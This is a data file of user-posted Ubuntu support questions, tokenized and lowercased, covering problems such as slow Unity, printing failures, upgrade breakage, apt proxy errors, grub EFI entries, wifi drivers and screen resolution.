281248	why is unity so slow ?	i recently installed this 12.10 version . i am facing problem with the user interface . like opening browsers and opening dash home and typing in dash home bar and also it is very slow if i try to minimize them . but once i open the browser i do not see any problem like i can access net pretty fast as same as my windows 7. but only i am facing problems with ui screen while opening and minimizing . i did search in google . someone said i need to edit the xorg.conf file but i do not see such file in the path `` /etc/x11/ '' . can someone help me how to solve this ? my laptop specs are as below : graphics : ati mobility radeon hd 5470 processor : intel ( r ) core i5 @ 2.27ghz system type : 64-bit memory : 4 gb
281250	printer does not print , queue showing completed , can not correct setup	using 12.04 ; i recently added a usb connection for arduino board . now i can not print using a canon ip2600 printer . it is shown as installed but if i try to uninstall or update properties i get a request for a password which is rejected regardless of what is entered , my username is a member of admin and i added it to lp group but i still can not print . the print queue shows that the printing was completed but it was not . i am not allowed to empty queue and no update of drivers is shown in the print box . printer works fine if i boot into windows so printer and usb cable are ok .
281252	how to install 3g dongles on ubuntu 12 ?	i just bought an unlocked idea 3g netsetter dongle ( usb stick for internet connection ) and have an aircel sim ( 3g activated on unlimited plan ) . i cnnnected my sim properly with dongle . nothing happened ! please tell me how to install it . i am using ubuntu 12 with windows xp ( installed using wubi ) . p.s it 's detecting on windows but not on ubuntu . thanks ! : )
281253	upgrade installation confusion 12.04 to 12.10	i just tried to upgrade from 12.04lts to 12.10 ... i used the update manager and everything was going on well till my system froze up . i had no option than to hard reboot and realized that i could not continue using the update manager . i used apt-get -f install and looks like installation was done successfully . problem is system manager still tells me i have 12.04 lts installed but when i run ls_release -a in the terminal it tells me i have 12.10 installed . i realize many things are malfunctioning and i ca n't update . it says can not install updates : try partial update and when i try it says can not ugrade from quantal to precise . i wonder if anyone has answers for me ... thanks
281256	how to set the path of `` run application '' in metacity ?	in metacity , alt-f2 opens a dialog `` run application '' . how to customize the $ path that is used for autocompletion and running the command ? ( it 's not the $ path of .bashrc )
281261	what is the downloaded iso file ?	i 'm trying to create a bootable usb , but the boot and run linux software needs an iso file according to the instructions on ubuntu help . i have no idea what that is or where to get it .
281263	execute a shell-script when closing laptop lid	now i have two scripts and i want to execute them respectively when i close the laptop lip and open it . how can i do this ?
281265	error message : untrusted packages and libdrm-nouveau1a libdrm-radeon1	ubuntu finds update but when i click on install update , it gives an error . i released that there are some people out there who 's getting that message too , but mine is different and non of the solutions worked for me . update-manager requires installation of untrusted packages this requires installing packages from unauthenticated sources . libdrm-nouveau1a libdrm-radeon1
281268	google chrome not opening after install	when i try to open google chrome from folder using home : filesystem - > opt - > chrome and double-click on chrome , it complains : could not display `` /opt/google/chrome/chrome '' there is no application installed for shared library files . do you want to search for an application to open this file ? and when i say yes , it just gives me a window without any name of application . i had to cancel . when i went to terminal and cd to /opt/google/chrome/ and run nohup ./chrome & then it works . has anyone had this problem and is there anyway to resolve this opening issue ?
281274	ubuntu 12.10 i386 installed on macbook but not working at all	i have searched through a lot of questions but it looks that nobody had the same problem . i have successfully installed ubuntu 12.10 on my macbook ( mid 2009 ) from a burned dvd . while keeping a 450 g partition for mac os x , i have created a main 150 g partition for ubuntu , a 2g swap partition , and finally a small partition for bios-grub , since it did n't want to continue the installation if there were none . i remember having set the boot loader to the 150 g ubuntu partition , but without really being sure of what i did . when i restart my computer , the refit menu gives me the choice between os x and ubuntu , but when i choose ubuntu the only thing i get is a black screen with a blinking cursor ... at least i did n't ruin my os x , but i have tried tho reinstall it the same way and i got exactly the same result . do you know what i could have done wrong ? thank you for your help .
281276	installing ubuntu on a computer with two hardrives	i am trying to install ubuntu on a desktop computer with two hard drives . the first hard drive , has all the main windows xp files while the second is data storage . when running the ubuntu live usb , it would come up with the installer and instead of displaying the side by side option , it displays the clean install and the manual partitioning option . i intend to install ubuntu on the main drive , but it would n't matter if it was to be installed on the data drive . if this matters , i would like to use burg as a boot manager .
281279	unable to connect to 127.0.0.1:9050 : err http : //extras.ubuntu.com quantal release.gpg	i have ubuntu 12.10 installed , since about 1 month ago i ca n't install any program from software center , or synaptic or terminal , and also i can not update my installed software . here is a screenshot from software center : you see there is neither info of the program nor the install bottom . ( in `` software source '' , multiverse source is checked ) the log of command sudo apt-get upgrade is : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . and the log of command sudo apt-get update is : err http : //ir.archive.ubuntu.com quantal inrelease err http : //ir.archive.ubuntu.com quantal-updates inrelease err http : //ir.archive.ubuntu.com quantal-backports inrelease err http : //ir.archive.ubuntu.com quantal-security inrelease err http : //extras.ubuntu.com quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ir.archive.ubuntu.com quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ir.archive.ubuntu.com quantal-updates release.gpg unable to connect to 127.0.0.1:9050 : err http : //ir.archive.ubuntu.com quantal-backports release.gpg unable to connect to 127.0.0.1:9050 : ign https : //private-ppa.launchpad.net quantal inrelease err http : //extras.ubuntu.com quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ir.archive.ubuntu.com quantal-security release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9050 : ign https : //private-ppa.launchpad.net quantal release.gpg ign https : //private-ppa.launchpad.net quantal release err https : //private-ppa.launchpad.net quantal/main amd64 packages could n't connect to host err https : //private-ppa.launchpad.net quantal/main i386 packages could n't connect to host ign https : //private-ppa.launchpad.net quantal/main translation-en_us ign https : //private-ppa.launchpad.net quantal/main translation-en reading package lists ... done w : failed to fetch http : //ir.archive.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-updates/inrelease w : failed to fetch http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-backports/inrelease w : failed to fetch http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-security/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/alexeftimie/ppa/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/alexmurray/indicator-sensors/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/amith/ubuntutools/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/atareao/atareao/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/debfx/virtualbox/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/indicator-multiload/stable-daily/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/jfi/ppa/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/lucid-bleed/ppa/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/texlive-backports/ppa/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/tualatrix/next/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/flareget-amd64/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/gtk3/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ir.archive.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-updates/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-backports/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-security/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/alexeftimie/ppa/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/alexmurray/indicator-sensors/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/amith/ubuntutools/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/atareao/atareao/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/debfx/virtualbox/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/indicator-multiload/stable-daily/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/jfi/ppa/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/lucid-bleed/ppa/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/texlive-backports/ppa/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/tualatrix/next/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/flareget-amd64/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/gtk3/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/motorbike/ubuntu/dists/quantal/main/binary-amd64/packages could n't connect to host w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/motorbike/ubuntu/dists/quantal/main/binary-i386/packages could n't connect to host w : some index files failed to download . they have been ignored , or old ones used instead . in update manager when i want to check for updates it says : unable to download the following packages : failed to download http : //ir.archive.ubuntu.com/ubuntu/dists/quantal/inrelease failed to download http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-updates/inrelease failed to download http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-backports/inrelease failed to download http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-security/inrelease failed to download http : //extras.ubuntu.com/ubuntu/dists/quantal/inrelease failed to download http : //ir.archive.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : failed to download http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-updates/release.gpg unable to connect to 127.0.0.1:9050 : failed to download http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-backports/release.gpg unable to connect to 127.0.0.1:9050 : failed to download http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9050 : failed to download http : //ir.archive.ubuntu.com/ubuntu/dists/quantal-security/release.gpg unable to connect to 127.0.0.1:9050 : please help . p.s . i already have seen this update manager unable to get updates , but that did n't help me , so please do n't mark this question as a duplicate
281280	customization : specific de for specific user	is it possible to setup ? suppose , i have two users : home and work . for home i want to use gnome shell or kde a beautiful de . ( or something else ) for work i want to use lxde or mate as fastest de . ( and also more energy efficient ) maybe this can be done in other way . i do n't know these ways , please , advise .
281283	errors with `` back in time ''	i get these errors with `` back in time '' . can someone explain how to avoid them ? [ e ] error : rsync : symlink `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.config/chromium/singletoncookie '' - > `` 11676890789582771720 '' failed : operation not permitted ( 1 ) [ e ] error : rsync : symlink `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.config/chromium/singletonlock '' - > `` refle-2305 '' failed : operation not permitted ( 1 ) [ e ] error : rsync : symlink `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.config/chromium/singletonsocket '' - > `` /tmp/.org.chromium.chromium.nsuolr/singletonsocket '' failed : operation not permitted ( 1 ) [ e ] error : rsync : symlink `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.kde/socket-refle '' - > `` /tmp/ksocket-refle '' failed : operation not permitted ( 1 ) [ e ] error : rsync : symlink `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.kde/tmp-refle '' - > `` /tmp/kde-refle '' failed : operation not permitted ( 1 ) [ e ] error : rsync : symlink `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.pulse/a720e9d91d67a4671223dd9100000009-runtime '' - > `` /tmp/pulse-yd4kgx1fivgw '' failed : operation not permitted ( 1 ) [ e ] error : rsync : mkstemp `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.local/share/gvfs-metadata/.afc : host=c0d85dff9221e93bd569ad19c719a9cc812cc00a.prrwob '' failed : invalid argument ( 22 ) [ e ] error : rsync : mkstemp `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.local/share/gvfs-metadata/.afc : host=c0d85dff9221e93bd569ad19c719a9cc812cc00a , port=3.5ffq0l '' failed : invalid argument ( 22 ) [ e ] error : rsync : mkstemp `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.local/share/gvfs-metadata/.afc : host=c0d85dff9221e93bd569ad19c719a9cc812cc00a , port=3-c2bd17dd.log.dw3kc6 '' failed : invalid argument ( 22 ) [ e ] error : rsync : mkstemp `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/.local/share/gvfs-metadata/.afc : host=c0d85dff9221e93bd569ad19c719a9cc812cc00a-1da33d62.log.u2bigr '' failed : invalid argument ( 22 ) [ e ] error : rsync : symlink `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/documents/studium/uni **/verkn端pfung mit programmieren '' - > `` /host/users/**/documents/studium/uni bayreuth/programmieren '' failed : operation not permitted ( 1 ) [ e ] error : rsync : symlink `` /media/trekstor/sicherung/backintime/refle/root/1/new_snapshot/backup/home/refle/ubuntu one/shared with me '' - > `` /home/refle/.local/share/ubuntuone/shares '' failed : operation not permitted ( 1 ) thank you
281292	how can i rename a file in a different path without changing the current directory or writing the path twice ?	for example , i want to rename tif/fat/tul/codes/mycode.pl to thecode.pl in the same directory . currently i know these : mv tif/fat/tul/codes/mycode.pl tif/fat/tul/codes/thecode.pl , which requires me to repeat typing the full path ( can be annoying if the path is quite long ) or cd mv tif/fat/tul/codes/ mv mycode.pl thecode.pl the drawback being i have to type 2 commands , and there is a side-effect of changing the current directory ( which can be undesirable in many cases ) is there a more efficient way to do this ?
281293	creating a .desktop file for a new application	i just installed the lastest version of ugene . i works fine but in order to use it , i have to enter the following in the terminal : cd ugene-1.11.5/ then execute ./ugene -ui to launch ugene gui . this takes too long . i would like to build a .desktop file for ugene to be used in ubuntu 12.04 so that i can simply open it from the unity launcher . not sure if this is helpful but the website says : by default ugene script launches the command-line version of ugene . here 's what i have ( not sure if it 's right ) : [ desktop entry ] version=1.0 name=my unipro ugene genericname=integrated bioinformatics suite comment=unipro ugene is a cross-platform visual environment for dna and protein sequence analysis . mimetype=text/english ; text/plain ; text/x-makefile ; text/x-c++hdr ; text/x-c++src ; text/x-chdr ; text/x-csrc ; text/x-java ; text/x-moc ; text/x-pascal ; text/x-tcl ; text/x-tex ; application/x-shellscript ; text/x-c ; text/x-c++ ; exec=/home/samuel/ugene-1.11.5 ./ugene -ui -c % f icon=/usr/share/icons/hicolor/scalable/apps/ugene.svg type=application terminal=true categories=utility ; development ; startupwmclass=ugene i added the launcher named my unipro ugene to my unity bar and tried opening it but it does n't appear . i must be missing something . i do n't know what the startwmcclass field is suppose to be nor do i know whether i entered the correct mimetype .
281298	help ! need admin password or how to reset !	i recently installed ubuntu 11.10 on my macbook . i tried to do an update but it asked for an admin password that i dont have and never created . so i tried changing it through recovery mode , the only problem is i cant use the keyboard or mouse and soon as i enter recovery , even with a usb keyboard . any ideas guys ?
281303	what does each runlevel number stand for	cause ubuntu uses upstart instead of init , there is some different from red hat . but how can i get the list of each runlevel number standing for , such as init 0 means shutdown . man init ca n't show the list . so which command or man page cant print the list . thx !
281305	how to get rid of .goutputstream files	i have many files with names like .goutputstream-aaaaaa in my home folder and i do n't know why they 've been created and how to get rid of them ? i usually delete them but they would appear again in days .
281311	change vpn gateway with command line	is there a way to change the gateway of an existant vpn connection with a command line ? changing the gateway value in the connection file with sed does n't work for me . thanks
281315	how to add a password option in cli ?	i 've googled extensively but have n't found how to add a password option so i do n't have to type it in manually . i 've created the following alias : alias int='sudo service network-manager restart' but i do n't want to type in my password every time , is there some command i can pass to the alias with my password ?
281317	how to prevent installation of ruby version manager on 12.04 server from failing ? ( works on desktop )	here is some weird error i 'm experiencing trying to install ruby version manager on a server running ubuntu 12.04 : the problem is that when i make some test on my pc , which is running 12.04 `` regular edition '' following the official guide ( https : //rvm.io/rvm/install/ ) it works smoothly . but whenever i try to follow the guide to install rvm on a server running ubuntu 12.04 `` server edition '' rvm remains `` unsourced '' and it is not recognized as a command , even if i manually source the script , it does n't matter . i 've been fighting with this for almost two days . but the only mention i found to a similar error seems to be related to an already-patched bug on rvm that seemingly should n't be bothering anyone at all at the time of posting this question . ( rvm : command not found - rvm multiuser install on ubuntu 12.04 server on stackoverflow ) . other guides that promise to get ruby ( and rvm ) up and running on your 12.04 machine also fail with this server . i 'm running the amd64 version and the server instance is fresh and has nothing else but git installed .
281321	grub efi entries and boot-repair	i installed ubuntu 12.10 on a dell laptop with oem windows 8 on it . at first , my grub menu did n't show at all , so i changed the /etc/default/grub file commenting the line grub_hidden_timeout=0 . after that , my grub menu appeared , but it showed only the ubuntu entries ( no trace of windows 8 entries ) . so i booted ubuntu from livecd and followed this guide : ubuntu boot-repair . at the end a window appeared telling me this : please do not forget to make your bios boot on sda1/efi/ubuntu/grubx64.efi file . which is something i did n't get how to manage . i went beyond this problem pretending indifference . now i have my grub menu working and i can boot windows 8 , but i 'm wondering what are the different entries that i have in the menu . here they are : ubuntu advanced options for ubuntu windows uefi bkpbootmgfw.efi windows boot uefi loader efi/dell/boot/bootmgfw.efi efi/dell/boot/bootx64.efi system setup i do n't know what these different entries mean , and i 'd like to know if i can remove any of them from the grub menu . so i rephrase my questions : how was i supposed to make my bios boot on sda1/efi/ubuntu/grubx64.efi file ? what do all these entries mean ? what are their differences ? can i remove any of them ? if so , how ?
281323	when mounting a foreign filesystem how does ubuntu match up users ?	if i mount a filesystem that 's been part of another ubuntu installation ( systemb let 's call it ) how does my system ( systema ) work out permissions ? specifically : does usera on my system get access to usera 's files in the foreign filesystem from systemb just because they have the same name ? must the passwords match ? that implies to me that the filesystem must store user+password together somewhere so they can travel with the filesystem . what happens if there is a userb on systemb and no matching user on my system ? who can access his files from systema ? can root ?
281329	reinstall ubuntu software center	ciao a tutti , ho disinstallato l'ubuntu software center perchăš mi dava problemi e , usando le vostre precedenti guide , ho provato a reinstallarlo , ma mi genera errori nel terminale e non lo installa . cosa posso fare ? hello all , i uninstalled the ubuntu software center because it gave me problems and , using your previous guides , i tried to reinstall it , but it generates errors in the terminal and will not install . what can i do ?
281331	usb legacy support	i have ubuntu 64 bit precise installed on a gigabyte ga-h61m-s2pv using dual uefi bios ( 8gb memory with intel ( r ) pentium ( r ) cpu g840 @ 2.80ghz cpu ) . the bios has started to stick on its display for 2 minutes before displaying the ubuntu login screen . it 's very hit or miss as to whether the keyboard & mouse then work . sometimes they work ( after not working initially ) when i move them to different usb sockets ( i 've tried both direct connection to the computer & indirectly thru usb hubs : it seems to make little difference to the devices working ) . i 'm wondering if it 's worth disabling usb legacy support ? ps i previously had the same problem with ubuntu 32 bit precise before clean installing 64 bit ) . i 've seen some posts on ubuntu forum about 64 bit problems with usb & ethernet , which recommended using vt-d ( intel 's equivalent of immu ) : i did that but it made no difference ) .
281337	installing programs on ubuntu live	is there possibly a way of installing a program on ubuntu live ( on usb ) and the have it there like a all preinstalled programs ( such as open office ) ? if it were possible , it 'd be so great ! thanks .
281338	i ca n't update after failed installation of compiz-plugins-unsupported	i already installed compiz with extra plugins and followed the forum tutorial on how to install the unsupported compiz plugins . these are the commands i executed : sudo add-apt-repository ppa : compiz sudo apt-get update sudo apt-get upgrade until here everything worked alright but after entering the following command : sudo apt-get install compiz-fusion-plugins-unsupported i get this error message : reading package lists ... done building dependency tree reading state information ... done e : unable to locate if the package compiz-fusion-plugins-unsupported how can i fix this , now i can not update ubuntu with the software update center because i get this message : failed to download repository information do check internet connection ( im online and my internet conection works all good ) these are the details : w : failed to fetch http : //ppa.launchpad.net/compiz/ppa/ ... source/sources 404 not found w : failed to fetch http : / / ppa.launchpad.net/compiz/ppa/ ... amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/compiz/ppa/ ... -i386/packages 404 not found e : some index files failed to download . have been ignored , or old ones used instead . how i can solve this problem ? i would like to either install compiz-plugins-unsupported or go back to my previous configuration and be able to update again thank you very much in advance for your help .
281340	run-init /sbin/init exec format error after reinstalling ubuntu 32-bit with ubuntu 64-bit	today i wanted to install ubuntu 12.10 64-bit , because i need it for certain programs . however during installation , the installer offered me to reinstall my old system ( 32-bit ) , so did ( i know , i must have had a brain fart or what to think it would work ) . now when i want to boot my new system i get something along these lines : run-init : /sbin/init : exec format error kernel panic - not syncing : attempted to kill init ! exitcode=0x00 is it still possible to recover from this , or i 'd better wipe out my current installation and start out fresh ? also , while googling i found this . is it true that fixing grub could help ? if so , how to do it ?
281341	intel centrino wireless-n 2230 . lenovo thinkpad t430u . wifi not working . network-manager-applet not visible in system tray	my specs sudo lshw -c network *-network deaktiviert beschreibung : kabellose verbindung produkt : centrino wireless-n 2230 hersteller : intel corporation physische id : 0 bus-informationen : pci @ 0000:03:00.0 logischer name : wlan0 version : c4 seriennummer : 60:36 : dd:0f : cb:52 breite : 64 bits takt : 33mhz f채higkeiten : pm msi pciexpress bus_master cap_list ethernet physical wireless konfiguration : broadcast=yes driver=iwlwifi driverversion=3.5.0-27-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11bgn ressourcen : irq:46 memory : f4700000-f4701fff here 's what i 've tried so far i checked if there was a hardware of software block , there is n't : rfkill list 0 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no i tried to clean the interfaces-file gksu gedit /etc/network/interfaces but there was nothing writen in the file except : auto lo iface lo inet loopback i checked if the `` iwlwifi '' -module is loaded , however i 'm not sure what the output means . lsmod |grep iwlwifi iwlwifi 399576 0 mac80211 555272 1 iwlwifi cfg80211 208382 2 iwlwifi , mac80211 i assumed that the `` 0 '' in the first line of the output means , that `` iwlwifi '' is not loaded . so i tried to run `` iwlwifi '' with the `` modprobe '' -command . sudo modprobe iwlwifi -r sudo modprobe iwlwifi 11n_disable=0 i 'm dualbooting windows on this machine , and in windows the wifi works just fine . the router also works obviously . i do n't know if this important , but i disabled my bluetooth by default a few days ago by editing rc.local with rfkill block bluetooth ( but the wifi worked the following two days ) i also installed virtualbox a few days ago ( since i 've read about network problems after installing vbox , i wanted to mention this ) , but only tried to install windows 7 as a guest . and although the symbol for the nm-applet is not visible , i checked synaptic package manager and nm seams to be installed . your help is very much appreciated . ps : the output is in partly in german . deaktiviert ( after the lshw command ) means disabled , everything else seams to be the normal output . checking the message logs : dmesg | grep iwl [ 3.427995 ] iwlwifi : intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 3.427999 ] iwlwifi : copyright ( c ) 2003-2012 intel corporation [ 3.428189 ] iwlwifi 0000:03:00.0 : pci_resource_len = 0x00002000 [ 3.428193 ] iwlwifi 0000:03:00.0 : pci_resource_base = ffffc900057bc000 [ 3.428196 ] iwlwifi 0000:03:00.0 : hw revision id = 0xc4 [ 3.428350 ] iwlwifi 0000:03:00.0 : irq 46 for msi/msi-x [ 3.618390 ] iwlwifi 0000:03:00.0 : loaded firmware version 18.168.6.1 [ 3.618701 ] iwlwifi 0000:03:00.0 : config_iwlwifi_debug disabled [ 3.618707 ] iwlwifi 0000:03:00.0 : config_iwlwifi_debugfs enabled [ 3.618710 ] iwlwifi 0000:03:00.0 : config_iwlwifi_device_tracing enabled [ 3.618712 ] iwlwifi 0000:03:00.0 : config_iwlwifi_device_testmode enabled [ 3.618715 ] iwlwifi 0000:03:00.0 : config_iwlwifi_p2p disabled [ 3.618719 ] iwlwifi 0000:03:00.0 : detected intel ( r ) centrino ( r ) wireless-n 2230 bgn , rev=0xc8 [ 3.618840 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 3.637741 ] iwlwifi 0000:03:00.0 : device eeprom ver=0x81c , calib=0x6 [ 3.637748 ] iwlwifi 0000:03:00.0 : device sku : 0x150 [ 3.637752 ] iwlwifi 0000:03:00.0 : valid tx ant : 0x3 , valid rx ant : 0x3 [ 3.637777 ] iwlwifi 0000:03:00.0 : tunable channels : 13 802.11bg , 0 802.11a channels [ 3.652582 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 74.692031 ] iwlwifi : intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 74.692034 ] iwlwifi : copyright ( c ) 2003-2012 intel corporation [ 74.692146 ] iwlwifi 0000:03:00.0 : pci_resource_len = 0x00002000 [ 74.692148 ] iwlwifi 0000:03:00.0 : pci_resource_base = ffffc900057bc000 [ 74.692150 ] iwlwifi 0000:03:00.0 : hw revision id = 0xc4 [ 74.692276 ] iwlwifi 0000:03:00.0 : irq 46 for msi/msi-x [ 74.696282 ] iwlwifi 0000:03:00.0 : loaded firmware version 18.168.6.1 [ 74.696623 ] iwlwifi 0000:03:00.0 : config_iwlwifi_debug disabled [ 74.696628 ] iwlwifi 0000:03:00.0 : config_iwlwifi_debugfs enabled [ 74.696631 ] iwlwifi 0000:03:00.0 : config_iwlwifi_device_tracing enabled [ 74.696634 ] iwlwifi 0000:03:00.0 : config_iwlwifi_device_testmode enabled [ 74.696637 ] iwlwifi 0000:03:00.0 : config_iwlwifi_p2p disabled [ 74.696641 ] iwlwifi 0000:03:00.0 : detected intel ( r ) centrino ( r ) wireless-n 2230 bgn , rev=0xc8 [ 74.696752 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 74.713452 ] iwlwifi 0000:03:00.0 : device eeprom ver=0x81c , calib=0x6 [ 74.713456 ] iwlwifi 0000:03:00.0 : device sku : 0x150 [ 74.713458 ] iwlwifi 0000:03:00.0 : valid tx ant : 0x3 , valid rx ant : 0x3 [ 74.713475 ] iwlwifi 0000:03:00.0 : tunable channels : 13 802.11bg , 0 802.11a channels [ 74.713774 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs'
281345	i do not find the version of libreoffice	i recently installed the wubi version of ubuntu12.10 . i need to find the version of libreoffice installed on my system , but i can not find it anywhere.who can help me ?
281349	xorg - resolution does not fit into screen	i have an 19-inch monitor with a 1366 x 768 native resolution and i 'm using an ati hd radeon 5670 . it does not detect my native resolution automatically , so i 've put something like this on my xorg.conf ( except for the numbers 1-9 , i 've put in the result of running cvt ) . section `` monitor '' identifier `` dvi-0 '' modeline `` 1368x768_60.00 '' 1 2 3 4 5 6 7 8 9 -hsync +vsync endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` dvi-0 '' subsection `` display '' modes `` 1368x768_60.00 '' endsubsection endsection section `` device '' identifier `` card0 '' driver `` radeon '' endsection so my resolution changes , but the problem is the resolution does not fit well to the screen . seems like some pixels to the top ( around 10px ) are not viewable , and the width does not fit as well , there are huge black spaces on the left and right of the screen . adjusting width settings on monitor messes up my font . on windows , 1366x768 works very well , any ideas how to fix this ?
